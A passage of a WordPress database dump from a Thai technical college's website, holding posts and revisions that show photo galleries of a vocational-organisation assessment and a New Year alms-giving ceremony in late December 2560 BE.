(332, 1, '2018-01-06 15:02:32', '2018-01-06 08:02:32', '', 'audit-avt-2-2560-01', '', 'inherit', 'closed', 'closed', '', 'audit-avt-2-2560-01', '', '', '2018-01-06 15:05:14', '2018-01-06 08:05:14', '', 342, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-01.jpg', 0, 'attachment', 'image/jpeg', 0),
(333, 1, '2018-01-06 15:02:41', '2018-01-06 08:02:41', '', 'audit-avt-2-2560-02', '', 'inherit', 'closed', 'closed', '', 'audit-avt-2-2560-02', '', '', '2018-01-06 15:05:14', '2018-01-06 08:05:14', '', 342, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-02.jpg', 0, 'attachment', 'image/jpeg', 0),
(334, 1, '2018-01-06 15:02:42', '2018-01-06 08:02:42', '', 'audit-avt-2-2560-03', '', 'inherit', 'closed', 'closed', '', 'audit-avt-2-2560-03', '', '', '2018-01-06 15:05:14', '2018-01-06 08:05:14', '', 342, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-03.jpg', 0, 'attachment', 'image/jpeg', 0),
(335, 1, '2018-01-06 15:02:44', '2018-01-06 08:02:44', '', 'audit-avt-2-2560-04', '', 'inherit', 'closed', 'closed', '', 'audit-avt-2-2560-04', '', '', '2018-01-06 15:05:14', '2018-01-06 08:05:14', '', 342, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-04.jpg', 0, 'attachment', 'image/jpeg', 0),
(336, 1, '2018-01-06 15:02:45', '2018-01-06 08:02:45', '', 'audit-avt-2-2560-05', '', 'inherit', 'closed', 'closed', '', 'audit-avt-2-2560-05', '', '', '2018-01-06 15:05:13', '2018-01-06 08:05:13', '', 342, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-05.jpg', 0, 'attachment', 'image/jpeg', 0),
(337, 1, '2018-01-06 15:02:47', '2018-01-06 08:02:47', '', 'audit-avt-2-2560-06', '', 'inherit', 'closed', 'closed', '', 'audit-avt-2-2560-06', '', '', '2018-01-06 15:05:13', '2018-01-06 08:05:13', '', 342, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-06.jpg', 0, 'attachment', 'image/jpeg', 0),
(338, 1, '2018-01-06 15:02:49', '2018-01-06 08:02:49', '', 'audit-avt-2-2560-07', '', 'inherit', 'closed', 'closed', '', 'audit-avt-2-2560-07', '', '', '2018-01-06 15:05:14', '2018-01-06 08:05:14', '', 342, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-07.jpg', 0, 'attachment', 'image/jpeg', 0),
(339, 1, '2018-01-06 15:02:51', '2018-01-06 08:02:51', '', 'audit-avt-2-2560-08', '', 'inherit', 'closed', 'closed', '', 'audit-avt-2-2560-08', '', '', '2018-01-06 15:05:14', '2018-01-06 08:05:14', '', 342, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-08.jpg', 0, 'attachment', 'image/jpeg', 0),
(340, 1, '2018-01-06 15:02:52', '2018-01-06 08:02:52', '', 'audit-avt-2-2560-09', '', 'inherit', 'closed', 'closed', '', 'audit-avt-2-2560-09', '', '', '2018-01-06 15:05:14', '2018-01-06 08:05:14', '', 342, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-09.jpg', 0, 'attachment', 'image/jpeg', 0),
(341, 1, '2018-01-06 15:02:54', '2018-01-06 08:02:54', '', 'audit-avt-2-2560-10', '', 'inherit', 'closed', 'closed', '', 'audit-avt-2-2560-10', '', '', '2018-01-06 15:05:14', '2018-01-06 08:05:14', '', 342, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-10.jpg', 0, 'attachment', 'image/jpeg', 0),
(342, 1, '2018-01-06 15:06:45', '2018-01-06 08:06:45', 'วิทยาลัยเทคนิคระยอง เข้ารับการประเมินองค์การมาตรฐานดีเด่น องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ระดับสถานศึกษาขนาดใหญ่ ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ประจำปีการศึกษา 2560 (รอบสอง) วันที่ 25 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-01.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-01-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-02.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-02-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-03.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-03-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-04.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-04-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-05.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-05-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-06.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-06-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-07.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-07-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-08.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-08-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-09.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-09-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-10.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-10-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>', 'การประเมินองค์การมาตรฐานดีเด่น', 'รอบสอง ...', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b9%80%e0%b8%82%e0%b9%89', '', '', '2018-01-21 14:52:17', '2018-01-21 07:52:17', '', 0, 'http://sim.technicrayong.ac.th/?p=342', 492, 'post', '', 0),
(343, 1, '2018-01-06 15:06:45', '2018-01-06 08:06:45', '<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-01-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-02-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-03-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-04-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-05-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-06-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-07-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-08-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-09-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-10-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a>', 'วิทยาลัยเทคนิคระยอง เข้ารับการประเมินองค์การมาตรฐานดีเด่น องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ระดับสถานศึกษาขนาดใหญ่ ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ประจำปีการศึกษา 2560 (รอบสอง) วันที่ 25 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '342-revision-v1', '', '', '2018-01-06 15:06:45', '2018-01-06 08:06:45', '', 342, 'http://sim.technicrayong.ac.th/?p=343', 0, 'revision', '', 0),
(344, 1, '2018-01-06 15:13:34', '2018-01-06 08:13:34', '', 'make-merit-old-year-2560-01', '', 'inherit', 'closed', 'closed', '', 'make-merit-old-year-2560-01', '', '', '2018-01-06 15:16:57', '2018-01-06 08:16:57', '', 354, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg', 0, 'attachment', 'image/jpeg', 0),
(345, 1, '2018-01-06 15:13:39', '2018-01-06 08:13:39', '', 'make-merit-old-year-2560-02', '', 'inherit', 'closed', 'closed', '', 'make-merit-old-year-2560-02', '', '', '2018-01-06 15:16:57', '2018-01-06 08:16:57', '', 354, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg', 0, 'attachment', 'image/jpeg', 0),
(346, 1, '2018-01-06 15:13:41', '2018-01-06 08:13:41', '', 'make-merit-old-year-2560-03', '', 'inherit', 'closed', 'closed', '', 'make-merit-old-year-2560-03', '', '', '2018-01-06 15:16:57', '2018-01-06 08:16:57', '', 354, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg', 0, 'attachment', 'image/jpeg', 0),
(347, 1, '2018-01-06 15:13:43', '2018-01-06 08:13:43', '', 'make-merit-old-year-2560-04', '', 'inherit', 'closed', 'closed', '', 'make-merit-old-year-2560-04', '', '', '2018-01-06 15:16:57', '2018-01-06 08:16:57', '', 354, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg', 0, 'attachment', 'image/jpeg', 0),
(348, 1, '2018-01-06 15:13:44', '2018-01-06 08:13:44', '', 'make-merit-old-year-2560-05', '', 'inherit', 'closed', 'closed', '', 'make-merit-old-year-2560-05', '', '', '2018-01-06 15:16:57', '2018-01-06 08:16:57', '', 354, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg', 0, 'attachment', 'image/jpeg', 0),
(349, 1, '2018-01-06 15:13:46', '2018-01-06 08:13:46', '', 'make-merit-old-year-2560-06', '', 'inherit', 'closed', 'closed', '', 'make-merit-old-year-2560-06', '', '', '2018-01-06 15:16:57', '2018-01-06 08:16:57', '', 354, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg', 0, 'attachment', 'image/jpeg', 0),
(350, 1, '2018-01-06 15:13:47', '2018-01-06 08:13:47', '', 'make-merit-old-year-2560-07', '', 'inherit', 'closed', 'closed', '', 'make-merit-old-year-2560-07', '', '', '2018-01-06 15:16:57', '2018-01-06 08:16:57', '', 354, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg', 0, 'attachment', 'image/jpeg', 0),
(351, 1, '2018-01-06 15:13:49', '2018-01-06 08:13:49', '', 'make-merit-old-year-2560-08', '', 'inherit', 'closed', 'closed', '', 'make-merit-old-year-2560-08', '', '', '2018-01-06 15:16:57', '2018-01-06 08:16:57', '', 354, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg', 0, 'attachment', 'image/jpeg', 0),
(352, 1, '2018-01-06 15:13:50', '2018-01-06 08:13:50', '', 'make-merit-old-year-2560-09', '', 'inherit', 'closed', 'closed', '', 'make-merit-old-year-2560-09', '', '', '2018-01-06 15:16:57', '2018-01-06 08:16:57', '', 354, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg', 0, 'attachment', 'image/jpeg', 0),
(353, 1, '2018-01-06 15:13:52', '2018-01-06 08:13:52', '', 'make-merit-old-year-2560-10', '', 'inherit', 'closed', 'closed', '', 'make-merit-old-year-2560-10', '', '', '2018-01-06 15:16:57', '2018-01-06 08:16:57', '', 354, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg', 0, 'attachment', 'image/jpeg', 0),
(354, 1, '2018-01-06 15:18:46', '2018-01-06 08:18:46', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /> </a><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'ทำบุญตักบาตรข้าวสารอาหารแห้ง', 'เนื่องในโอกาสวันขึ้นปีใหม่ ...', 'publish', 'closed', 'open', '', '%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97', '', '', '2018-01-21 14:52:42', '2018-01-21 07:52:42', '', 0, 'http://sim.technicrayong.ac.th/?p=354', 490, 'post', '', 0),
(355, 1, '2018-01-06 15:18:46', '2018-01-06 08:18:46', '<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 15:18:46', '2018-01-06 08:18:46', '', 354, 'http://sim.technicrayong.ac.th/?p=355', 0, 'revision', '', 0),
(361, 1, '2018-01-06 15:49:34', '2018-01-06 08:49:34', '<p align=\"center\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 15:49:34', '2018-01-06 08:49:34', '', 354, 'http://sim.technicrayong.ac.th/?p=361', 0, 'revision', '', 0),
(362, 1, '2018-01-06 15:50:27', '2018-01-06 08:50:27', '<p align=\"center\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n</p>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 15:50:27', '2018-01-06 08:50:27', '', 354, 'http://sim.technicrayong.ac.th/?p=362', 0, 'revision', '', 0),
(363, 1, '2018-01-06 15:51:01', '2018-01-06 08:51:01', '<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" 